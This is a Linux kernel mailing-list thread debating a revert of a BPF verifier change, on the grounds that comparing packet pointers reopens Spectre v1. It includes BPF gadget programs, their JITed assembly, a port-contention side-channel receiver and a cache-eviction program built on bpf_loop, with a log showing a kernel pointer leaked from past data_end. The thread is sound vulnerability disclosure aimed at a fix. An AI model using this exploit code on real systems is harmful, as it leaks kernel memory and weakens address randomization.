This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.
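As an illustration, a masked access against a static power-of-2 bound could look like the following (a minimal sketch only; read_masked() and its parameters are made up for this example and are not the verifier's actual rewrite):

static inline unsigned char read_masked(const unsigned char *base,
					unsigned long idx,
					unsigned long size /* static power-of-2 bound */)
{
	if (idx >= size)
		return 0;
	/* Architecturally a no-op after the check above, but it also bounds
	 * the speculative path if the branch is mispredicted. */
	idx &= size - 1;
	return base[idx];
}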
When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).
To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
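As a small worked example of why the comparison itself leaks no address bits (illustrative only):

	data     = base + headroom
	data_end = base + headroom + len

	(data + i) > data_end
	    <=> (base + headroom + i) > (base + headroom + len)
	    <=> i > len

so the branch outcome depends only on i and len (the packet length), never on the secret base address.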
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
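For reference, the receiving end of such an imul port-contention channel can be as simple as timing a chain of dependent imuls on the SMT sibling of the core running the BPF program (a userspace sketch assuming x86 and SMT; this is not the measurement code used for this report):

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

static uint64_t time_imul_chain(void)
{
	uint64_t start, end;
	unsigned long x = 1;

	start = __rdtsc();
	for (int i = 0; i < 1000; i++)
		/* dependent imuls keep the multiply ports busy */
		asm volatile("imul $97, %0, %0" : "+r"(x));
	end = __rdtsc();
	return end - start + (x & 1); /* keep x live */
}

int main(void)
{
	/* when the victim's secret bit is 1, its speculative imul competes
	 * for the same ports and these samples get slower */
	for (;;)
		printf("%llu\n", (unsigned long long)time_imul_chain());
}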
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data
r3 = data_end
r6 = ...                 // index to access, constant does not help
r7 = data_end - data     // only known at runtime, could be [0,PKT_MAX)
if !(r6 < r7) goto exit  // no masking of index in r6 happens
r2 += r6                 // addr. to access
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
// ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power-of-2 size for the packet data and to also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
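Roughly, the verifier would then only accept packet accesses of the following shape (a sketch only; pkt_mask and pkt_read() are hypothetical and do not exist today):

static inline unsigned char pkt_read(const unsigned char *data,
				     const unsigned char *data_end,
				     unsigned long off,
				     unsigned long pkt_mask /* pow2 size - 1 */)
{
	if (data + off >= data_end)
		return 0;
	/* With a power-of-2 allocation, this mask keeps even a mispredicted
	 * bounds check from producing an address outside the allocation. */
	off &= pkt_mask;
	return data[off];
}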
[1] 979d63d50c0c0f7bc537bf821e056cc9fe5abd38 ("bpf: prevent out of bounds speculation on pointer arithmetic")
[2] b2157399cc9898260d6031c5bfe45fe137c1fbe7 ("bpf: prevent out-of-bounds speculation")
[3] d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 ("bpf: Fix issue in verifying allow_ptr_leaks")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
Acked-by: Hagar Gamal Halim Hemdan <hagarhem@amazon.de>
Cc: Puranjay Mohan <puranjay12@gmail.com>
---
 kernel/bpf/verifier.c | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index bb78212fa5b2..b415a81149ed 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14050,12 +14050,6 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		return -EINVAL;
 	}
 
-	/* check src2 operand */
-	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
-	if (err)
-		return err;
-
-	dst_reg = &regs[insn->dst_reg];
 	if (BPF_SRC(insn->code) == BPF_X) {
 		if (insn->imm != 0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14067,13 +14061,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		if (err)
 			return err;
 
-		src_reg = &regs[insn->src_reg];
-		if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) &&
-		    is_pointer_value(env, insn->src_reg)) {
+		if (is_pointer_value(env, insn->src_reg)) {
 			verbose(env, "R%d pointer comparison prohibited\n",
 				insn->src_reg);
 			return -EACCES;
 		}
+		src_reg = &regs[insn->src_reg];
 	} else {
 		if (insn->src_reg != BPF_REG_0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14081,6 +14074,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
+	/* check src2 operand */
+	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
+	if (err)
+		return err;
+
+	dst_reg = &regs[insn->dst_reg];
 	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
 
 	if (BPF_SRC(insn->code) == BPF_K) {
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).

To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attacker can send many large packets to train that data + X < data_end and then send a small packet where the CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit is 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says:

	/* Speculative access to be prevented. */
+	char secret = *((char *) iph);
+
+	/* Leak the first bit of the secret value that lies behind data_end to a
+	 * SMP sibling thread that also executes imul instructions. If the bit
+	 * is 1, the sibling will experience a slowdown. */
+	long long x = secret;
+	if (secret & 1) {
+		x *= 97;
+	}
the comment is correct, but speculative access alone is not enough to leak data.
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).

To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attacker can send many large packets to train that data + X < data_end and then send a small packet where the CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit is 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says: /* Speculative access to be prevented. */
char secret = *((char *) iph);
/* Leak the first bit of the secret value that lies behind data_end to a
* SMP sibling thread that also executes imul instructions. If the bit
* is 1, the sibling will experience a slowdown. */
long long x = secret;
if (secret & 1) {
x *= 97;
}
the comment is correct, but speculative access alone is not enough to leak data.
What you write makes sense, it will probably be hard to craft an exploit. Where it's a bit more of an unknown to me is whether struct skb_shared_info could have e.g. destructor_arg rather static (at least the upper address bits) so that you could leak out kernel addresses.
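For context, skb_shared_info (and thus destructor_arg) sits directly at skb->end, right behind the linear data area, which is what a speculative read past data_end would run into (simplified sketch based on include/linux/skbuff.h, not a verbatim copy):

/*
 *   skb->head ... skb->data ... skb->data_end (tail) ... skb->end
 *                                                          |
 *                                    struct skb_shared_info {
 *                                            ...
 *                                            void *destructor_arg;
 *                                            skb_frag_t frags[MAX_SKB_FRAGS];
 *                                    };
 *
 * #define skb_shinfo(SKB) ((struct skb_shared_info *)(skb_end_pointer(SKB)))
 */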
On Thu, Sep 14, 2023 at 10:24 AM Daniel Borkmann daniel@iogearbox.net wrote:
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).

To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
The above analysis is correct, but unlike traditional spec_v1 the attacker doesn't control data/data_end. The attacker can send many large packets to train that data + X < data_end and then send a small packet where the CPU will mispredict that branch and data + X will speculatively read past data_end, so the attacker can extract a bit past data_end, but data/data_end themselves cannot be controlled. So whether this bit is 0 or 1 has no bearing. The attack cannot be repeated for the same location. The attacker can read one bit 8 times in a row and all of them will be from different locations in memory. Same as reading 8 random bits from 8 random locations. Hence I don't think this revert is necessary. I don't believe you can craft an actual exploit.
Your patch 3 says: /* Speculative access to be prevented. */
char secret = *((char *) iph);
/* Leak the first bit of the secret value that lies behind data_end to a
* SMP sibling thread that also executes imul instructions. If the bit
* is 1, the sibling will experience a slowdown. */
long long x = secret;
if (secret & 1) {
x *= 97;
}
the comment is correct, but speculative access alone is not enough to leak data.
What you write makes sense, it will probably be hard to craft an exploit. Where it's a bit more of an unknown to me is whether struct skb_shared_info could have e.g. destructor_arg rather static (at least the upper address bits) so that you could leak out kernel addresses.
You mean since skb_shared_info is placed after skb->end and in the zero-copy case destructor_arg may be initialized with the same kernel pointer for multiple skb-s? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one, so that the shared_info after skb->end has the same uarg pointer in all packets? So every skb->data + X is a different location, but all of them point to data that has uarg == destructor_arg?
That would be feasible in theory, but in order to speculate the loads the branch mispredict has to be reliable. The spec v1 attack requires that one of the two loads feeding into the compare operation is slow. In this case both the data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from the cache. Remember that we rearranged the 'max_entries' field in struct bpf_map specifically to be in a different cache line than the fields controlled by user space. It was a necessary part of the spec v1 attack.
So I still believe this revert is unnecessary and this speculative execution is not exploitable.
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
You mean since skb_shared_info is placed after skb->end and in the zero-copy case destructor_arg may be initialized with the same kernel pointer for multiple skb-s? The attacker cannot construct the address from data_end. The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END. But the attacker can do skb->data + X. The idea is that they can train the branch to mispredict with a large packet and then send a small one, so that the shared_info after skb->end has the same uarg pointer in all packets? So every skb->data + X is a different location, but all of them point to data that has uarg == destructor_arg?
That would be feasible in theory, but in order to speculate the loads the branch mispredict has to be reliable. The spec v1 attack requires that one of the two loads feeding into the compare operation is slow. In this case both the data and data_end loads are going to be fast. The attacker cannot evict skb->data or skb->data_end from the cache.
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache, all 64-byte cachelines can be evicted by iterating over a 64KiB array using 64-byte increments, that's only 1k iterations. Meanwhile, skb->data can be safe in r15 as this is not used by bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be possible as bpf_loop() currently has an iteration limit of 8 million. To extend that, userspace could work on evicting the L3 cache from other cores and make the speculation window even larger. This would of course slow the whole reading process down, but in return you can also leak more data by indexing into the leak-array using a full byte.
For reference, here's the full program and assembly it is jited to:
static long callback_fn(__u32 index, void *ctx)
{
	__u32 key = index * 8;
	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);

	if (value) {
		*value = 2 * *value;
		return 0;
	}
	return 1;
}
SEC("tcx/ingress") __naked void pkt_ptr(void) { // +76: data // +80: data_end asm volatile (" \ r6 = 0; \ r7 = r1; \ prepare_data_%=: \ r8 = *(u32 *)(r1 + 76); \ r9 = r8; \ r9 += 34; \ evict_loop_%=: \ w1 = 1024; \ r2 = %[callback_fn] ll; \ r3 = 0; \ *(u64 *)(r10 - 8) = r3; \ r3 = r10; \ r3 += -8; \ r4 = 0; \ call %[bpf_loop]; \ gadget_%=: \ r2 = *(u32 *)(r7 + 80); \ if r2 <= r9 goto exit_%=; \ r5 = *(u8 *)(r7 + 14); \ *(u64*)(r10 - 8) = r5; \ r2 = r10; \ r2 += -8; \ r1 = %[leakmap] ll; \ call %[bpf_map_lookup_elem]; \ if r0 == 0 goto exit_%=; \ r6 = *(u64 *)(r0 + 0); \ exit_%=: r0 = r6; \ exit; \ " : : __imm_addr(leakmap), __imm_addr(callback_fn), __imm(bpf_loop), __imm(bpf_map_lookup_elem) : __clobber_all); }
bpf_prog_64fe264baec539aa_pkt_ptr:
; asm volatile ("                                 \
   0: endbr64
   4: nopl 0x0(%rax,%rax,1)
   9: xchg %ax,%ax
   b: push %rbp
   c: mov %rsp,%rbp
   f: endbr64
  13: sub $0x20,%rsp
  1a: push %rbx
  1b: push %r13
  1d: push %r14
  1f: push %r15
  21: xor %ebx,%ebx
  23: mov %rdi,%r13
  26: mov 0xc8(%rdi),%r14
  2d: mov %r14,%r15
  30: add $0x22,%r15           // data prepared
  34: mov $0x2000,%edi
  39: movabs $0xffffffffc01d09b0,%rsi
  43: xor %edx,%edx
  45: mov %rdx,-0x8(%rbp)
  49: lfence
  4c: mov %rbp,%rdx
  4f: add $0xfffffffffffffff8,%rdx
  53: xor %ecx,%ecx
  55: cmp $0x800000,%rdi
  5c: jbe 0x0000000000000065
  5e: mov $0xfffffff9,%eax
  63: jmp 0x00000000000000a2
  65: mov %rbx,-0x20(%rbp)
  69: mov %r13,-0x18(%rbp)
  6d: mov %r14,-0x10(%rbp)
  71: mov %rdi,%rbx
  74: xor %r13d,%r13d
  77: mov %rdx,%r14
  7a: cmp %rbx,%r13
  7d: jae 0x0000000000000093
  7f: mov %r13,%rdi
  82: mov %r14,%rsi
  85: callq 0x0000000000000148
  8a: add $0x1,%r13
  8e: test %rax,%rax
  91: je 0x000000000000007a
  93: mov %r13,%rax
  96: mov -0x20(%rbp),%rbx
  9a: mov -0x18(%rbp),%r13
  9e: mov -0x10(%rbp),%r14
  a2: mov 0x50(%r13),%rsi      // load data_end
  a6: cmp %r15,%rsi            // use of data_end and data
  a9: jbe 0x00000000000000f7   // to mispredict
  ab: movzwq 0x7c(%r13),%r8    // use of data
  b0: shr $0x10,%r8d
  b4: and $0xff,%r8d
  bb: mov %r8,-0x8(%rbp)
  bf: mov %rbp,%rsi
  c2: add $0xfffffffffffffff8,%rsi
  c6: movabs $0xffffb85680acd000,%rdi
  d0: add $0x210,%rdi
  d7: mov 0x0(%rsi),%eax
  da: cmp $0x20000,%rax
  e1: jae 0x00000000000000ec
  e3: shl $0x3,%rax
  e7: add %rdi,%rax
  ea: jmp 0x00000000000000ee
  ec: xor %eax,%eax
  ee: test %rax,%rax
  f1: je 0x00000000000000f7
  f3: mov 0x0(%rax),%rbx
  f7: mov %rbx,%rax
  fa: pop %r15
  fc: pop %r14
  fe: pop %r13
 100: pop %rbx
 101: leaveq
 102: retq
long callback_fn(__u32 index, void * ctx):
bpf_prog_8e1ec5bf965fdd4a_callback_fn:
; __u32 key = index * 8;
   0: endbr64
   4: nopl 0x0(%rax,%rax,1)
   9: xchg %ax,%ax
   b: push %rbp
   c: mov %rsp,%rbp
   f: endbr64
  13: sub $0x8,%rsp
  1a: shl $0x3,%edi
; __u32 key = index * 8;
  1d: mov %edi,-0x4(%rbp)
  20: lfence
  23: mov %rbp,%rsi
;
  26: add $0xfffffffffffffffc,%rsi
; __u64 *value = bpf_map_lookup_elem(&evictmap, &key);
  2a: movabs $0xffffb85680a01000,%rdi
  34: add $0x210,%rdi
  3b: mov 0x0(%rsi),%eax
  3e: cmp $0x1000,%rax
  45: jae 0x0000000000000050
  47: shl $0x3,%rax
  4b: add %rdi,%rax
  4e: jmp 0x0000000000000052
  50: xor %eax,%eax
  52: mov $0x1,%edi
; if (value) {
  57: test %rax,%rax
  5a: je 0x0000000000000069
; *value = 2 * *value;
  5c: mov 0x0(%rax),%rdi
; *value = 2 * *value;
  60: shl %rdi
; *value = 2 * *value;
  63: mov %rdi,0x0(%rax)
  67: xor %edi,%edi
; }
  69: mov %rdi,%rax
  6c: leaveq
  6d: retq
Remember that we rearranged the 'max_entries' field in struct bpf_map specifically to be in a different cache line than the fields controlled by user space. It was a necessary part of the spec v1 attack.
On Mon, Sep 18, 2023 at 4:26 AM Luis Gerhorst gerhorst@amazon.de wrote:
It is true that this is not easily possible using the method most exploits use, at least to my knowledge (i.e., accessing the same address from another core). However, it is still possible to evict the cacheline with skb->data/data_end from the cache in between the loads by iterating over a large map using bpf_loop(). Then the load of skb->data_end would be slow while skb->data is readily available in a callee-saved register.
...
	call %[bpf_loop];				\
gadget_%=:						\
	r2 = *(u32 *)(r7 + 80);				\
	if r2 <= r9 goto exit_%=;			\
r9 is supposed to be available in the callee-saved register? :) I think you're missing that it is _callee_ saved. If that bpf_loop indeed managed to flush L1 cache the refill of r9 in the epilogue would be a cache miss. And r7 will be a cache miss as well. So there is no chance cpu will execute 'if r2 <= r9' speculatively.
I have to agree that the above approach sounds plausible in theory and I've never seen anyone propose to mispredict a branch this way. Which also means that no known speculation attack was crafted. I suspect that's a strong sign that the above approach is indeed a theory and it doesn't work in practice. Likely because the whole cache is flushed the subsequent misses will spoil all speculation. For spec v1 to work you need only one slow load in one side of that branch. The other load and the speculative code after should not miss. When it does the spec code won't be able to leave the breadcrumbs of the leaked bit in the cache. 'Leak full byte' is also 'wishful thinking' imo. I haven't seen any attack that leaks byte at-a-time.
So I will insist on seeing a full working exploit before doing anything else here. It's good to discuss these CPU speculation concerns, but we have to stay practical. Even removing BPF from the picture, there is so much code in the network core that checks packet boundaries. One can find plenty of cases of 'read past skb->end' under speculation and I'm arguing that none of them are exploitable.
On Tue, 19 Sep 2023 01:57:21 -0700 Alexei Starovoitov wrote:
r9 is supposed to be available in the callee-saved register? :) I think you're missing that it is _callee_ saved.
I'm sorry, I guess this was not clear enough: the idea was that this register is not used by the callee, and therefore it also does not have to be restored. Anyway, this does not appear to be important (I guess because the return has to pull the stack into the cache anyway), see below.
If that bpf_loop indeed managed to flush L1 cache the refill of r9 in the epilogue would be a cache miss. And r7 will be a cache miss as well. So there is no chance cpu will execute 'if r2 <= r9' speculatively.
I have to agree that the above approach sounds plausible in theory and I've never seen anyone propose to mispredict a branch this way. Which also means that no known speculation attack was crafted. I suspect that's a strong sign that the above approach is indeed a theory and it doesn't work in practice. Likely because the whole cache is flushed the subsequent misses will spoil all speculation. For spec v1 to work you need only one slow load in one side of that branch. The other load and the speculative code after should not miss. When it does the spec code won't be able to leave the breadcrumbs of the leaked bit in the cache. 'Leak full byte' is also 'wishful thinking' imo. I haven't seen any attack that leaks byte at-a-time.
So I will insist on seeing a full working exploit before doing anything else here. It's good to discuss these CPU speculation concerns, but we have to stay practical.
I tried this, and below you find a patch that leaks, from userspace and at roughly 100 B/h, the otherwise inaccessible skb_shinfo(skb)->frags[0].bv_page, which lies 196 bytes behind skb->data_end.
However, you are right in that there does not appear to be anything extremely useful behind skb->data_end, destructor_arg is NULL in my setup but I have also not found any code putting a static pointer there. Therefore if it stays like this and we are sure the allocator introduces sufficient randomness to make OOB reads useless, the original patches can stay. If you decide to do this I will be happy to craft a patch that documents that the respective structs should be considered 'public' under Spectre v1 to make sure nobody puts anything sensitive there.
The exploit (if you consider leaking a struct page * an exploit) does not leak more than one bit per mispredict (I did not try that), but flushing data_end from the cache using bpf_loop() indeed appears to have the desired effect (if you remove it, it doesn't work).
One can find plenty of cases of 'read past skb->end' under speculation and I'm arguing none of them are exploitable.
I have not looked into those but I guess flushing the cache in between the loads does not happen there.
Here's a shortened session log for using the patch below:
$ lsb_release -a
Description:    Debian GNU/Linux 11 (bullseye)
$ uname -a
Linux $HOST 5.10.0-25-cloud-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
$ lscpu
Socket(s):                2
Model name:               Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz
Virtualization:           VT-x
Vulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization
$ stress-ng --cache $(nproc) --cache-level 3 &
$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    0.297557] smpboot: CPU0: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (family: 0x6, model: 0x4f, stepping: 0x1)
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffdd2f04159400
You can already see that this looks like a pointer. To also let the kernel print the actual value, remove the '#if 0' in cls_bpf_classify(). With that you can check whether the middle bits are correct:
$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    2.399485] kernel skb_shinfo(skb)->frags[0].bv_page
[    2.399485]         *(ffff8a7541154670 ?= data+366 = ffff8a7541154670) = ffffe387c4155e00
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffe387c4155e00
Misc: Please make sure you always reply-to/cc gerhorst@cs.fau.de as gerhorst@amazon.de will become unmonitored shortly.
Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
---
 net/sched/cls_bpf.c                           |  22 ++
